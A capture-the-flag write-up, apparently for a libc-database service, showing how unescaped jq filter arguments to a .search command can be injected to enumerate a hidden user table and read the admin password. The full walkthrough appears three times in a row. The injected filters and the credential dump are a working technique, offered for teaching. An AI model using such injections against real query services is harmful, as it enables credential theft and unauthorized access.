When we netcat in, we get prompted for login and password. After entering the account given to us, we are prompted for a command ``` Authenticated {"users":{"username":"Dead","password":"pool"}} __ _ _ ____ _____ | | |_| |_ ___| \| __ | | |__| | . | _| | | __ -| |_____|_|___|___|____/|_____| as a service Type .help for help ``` If we run `.help`, we are given a few commands ``` > .help .help Print this help .version Print versions .search Search libcdb .secret Print flag ``` Running `.secret` complains that we are not admin ``` > .secret not admin no flag for u ``` Running `.search` without any parameters gives us the syntax and an example query: ``` > .search .search <*symbol> <*addr> Ex: .search fprintf 0x4b970 * required field ``` If we run the example query we get ``` Found: id 6acfaae0398dce58e1857599a274f6d8 name ubuntu_libc6-dbg_2.4-1ubuntu12.3_amd64 symbol fprintf address 0x4b970 Found: id fc1e12693e5762252bc44256d5a72506 name ubuntu_libc6-dbg_2.4-1ubuntu12_amd64 symbol fprintf address 0x4b970 ``` If we play around a bit and try to add some random `filter` arguments to the given example, we end up getting a syntax error: ``` > .search fprintf 0x4b980 * jq: error: syntax error, unexpected $end (Unix shell quoting issues?) at , line 1: . as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) | .* jq: 1 compile error ``` We now know that the search command searches a json database with `jq`. Now, we can enumerate some of the keys of `$maindb` to look for what else may be in the json file. To do this, we can set a `filter` argument like `|$maindb|.+{id:keys[0]}`. The final jq query executed would look like `. as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) |.|$maindb|.+{id:keys[0]}`. After testing `keys[1]`, we see that `$maindb` has a `users` key: ``` > .search fprintf 0x4b970 |$maindb|.+{id:keys[1]} Found: id users Found: id users ``` We can use the same exploit to enumerate the keys in `$maindb['user'][0]`: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[0]} Found: id password Found: id password > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[1]} Found: id username Found: id username ``` From here, we can just enumerate all of the usernames: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:.["username"]} Found: id 3k Found: id 3k > .search fprintf 0x4b970 |$maindb|.["users"][1]|.+{id:.["username"]} Found: id James Found: id James > .search fprintf 0x4b970 |$maindb|.["users"][2]|.+{id:.["username"]} Found: id Lars Found: id Lars > .search fprintf 0x4b970 |$maindb|.["users"][3]|.+{id:.["username"]} Found: id Dead Found: id Dead > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["username"]} Found: id admin Found: id admin ``` Then, the `admin` password: ``` > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["password"]} Found: id v3ryL0ngPwC4nTgu3SS0xfff Found: id v3ryL0ngPwC4nTgu3SS0xfff ``` We can then login with the admin credentials and run `.secret`.When we netcat in, we get prompted for login and password. After entering the account given to us, we are prompted for a command ``` Authenticated {"users":{"username":"Dead","password":"pool"}} __ _ _ ____ _____ | | |_| |_ ___| \| __ | | |__| | . | _| | | __ -| |_____|_|___|___|____/|_____| as a service Type .help for help ``` If we run `.help`, we are given a few commands ``` > .help .help Print this help .version Print versions .search Search libcdb .secret Print flag ``` Running `.secret` complains that we are not admin ``` > .secret not admin no flag for u ``` Running `.search` without any parameters gives us the syntax and an example query: ``` > .search .search <*symbol> <*addr> Ex: .search fprintf 0x4b970 * required field ``` If we run the example query we get ``` Found: id 6acfaae0398dce58e1857599a274f6d8 name ubuntu_libc6-dbg_2.4-1ubuntu12.3_amd64 symbol fprintf address 0x4b970 Found: id fc1e12693e5762252bc44256d5a72506 name ubuntu_libc6-dbg_2.4-1ubuntu12_amd64 symbol fprintf address 0x4b970 ``` If we play around a bit and try to add some random `filter` arguments to the given example, we end up getting a syntax error: ``` > .search fprintf 0x4b980 * jq: error: syntax error, unexpected $end (Unix shell quoting issues?) at , line 1: . as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) | .* jq: 1 compile error ``` We now know that the search command searches a json database with `jq`. Now, we can enumerate some of the keys of `$maindb` to look for what else may be in the json file. To do this, we can set a `filter` argument like `|$maindb|.+{id:keys[0]}`. The final jq query executed would look like `. as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) |.|$maindb|.+{id:keys[0]}`. After testing `keys[1]`, we see that `$maindb` has a `users` key: ``` > .search fprintf 0x4b970 |$maindb|.+{id:keys[1]} Found: id users Found: id users ``` We can use the same exploit to enumerate the keys in `$maindb['user'][0]`: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[0]} Found: id password Found: id password > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[1]} Found: id username Found: id username ``` From here, we can just enumerate all of the usernames: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:.["username"]} Found: id 3k Found: id 3k > .search fprintf 0x4b970 |$maindb|.["users"][1]|.+{id:.["username"]} Found: id James Found: id James > .search fprintf 0x4b970 |$maindb|.["users"][2]|.+{id:.["username"]} Found: id Lars Found: id Lars > .search fprintf 0x4b970 |$maindb|.["users"][3]|.+{id:.["username"]} Found: id Dead Found: id Dead > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["username"]} Found: id admin Found: id admin ``` Then, the `admin` password: ``` > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["password"]} Found: id v3ryL0ngPwC4nTgu3SS0xfff Found: id v3ryL0ngPwC4nTgu3SS0xfff ``` We can then login with the admin credentials and run `.secret`.When we netcat in, we get prompted for login and password. After entering the account given to us, we are prompted for a command ``` Authenticated {"users":{"username":"Dead","password":"pool"}} __ _ _ ____ _____ | | |_| |_ ___| \| __ | | |__| | . | _| | | __ -| |_____|_|___|___|____/|_____| as a service Type .help for help ``` If we run `.help`, we are given a few commands ``` > .help .help Print this help .version Print versions .search Search libcdb .secret Print flag ``` Running `.secret` complains that we are not admin ``` > .secret not admin no flag for u ``` Running `.search` without any parameters gives us the syntax and an example query: ``` > .search .search <*symbol> <*addr> Ex: .search fprintf 0x4b970 * required field ``` If we run the example query we get ``` Found: id 6acfaae0398dce58e1857599a274f6d8 name ubuntu_libc6-dbg_2.4-1ubuntu12.3_amd64 symbol fprintf address 0x4b970 Found: id fc1e12693e5762252bc44256d5a72506 name ubuntu_libc6-dbg_2.4-1ubuntu12_amd64 symbol fprintf address 0x4b970 ``` If we play around a bit and try to add some random `filter` arguments to the given example, we end up getting a syntax error: ``` > .search fprintf 0x4b980 * jq: error: syntax error, unexpected $end (Unix shell quoting issues?) at , line 1: . as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) | .* jq: 1 compile error ``` We now know that the search command searches a json database with `jq`. Now, we can enumerate some of the keys of `$maindb` to look for what else may be in the json file. To do this, we can set a `filter` argument like `|$maindb|.+{id:keys[0]}`. The final jq query executed would look like `. as $maindb | .libcDB[] | select(.symbol=="fprintf") | select(.address|contains("309632")) |.|$maindb|.+{id:keys[0]}`. After testing `keys[1]`, we see that `$maindb` has a `users` key: ``` > .search fprintf 0x4b970 |$maindb|.+{id:keys[1]} Found: id users Found: id users ``` We can use the same exploit to enumerate the keys in `$maindb['user'][0]`: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[0]} Found: id password Found: id password > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:keys[1]} Found: id username Found: id username ``` From here, we can just enumerate all of the usernames: ``` > .search fprintf 0x4b970 |$maindb|.["users"][0]|.+{id:.["username"]} Found: id 3k Found: id 3k > .search fprintf 0x4b970 |$maindb|.["users"][1]|.+{id:.["username"]} Found: id James Found: id James > .search fprintf 0x4b970 |$maindb|.["users"][2]|.+{id:.["username"]} Found: id Lars Found: id Lars > .search fprintf 0x4b970 |$maindb|.["users"][3]|.+{id:.["username"]} Found: id Dead Found: id Dead > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["username"]} Found: id admin Found: id admin ``` Then, the `admin` password: ``` > .search fprintf 0x4b970 |$maindb|.["users"][4]|.+{id:.["password"]} Found: id v3ryL0ngPwC4nTgu3SS0xfff Found: id v3ryL0ngPwC4nTgu3SS0xfff ``` We can then login with the admin credentials and run `.secret`.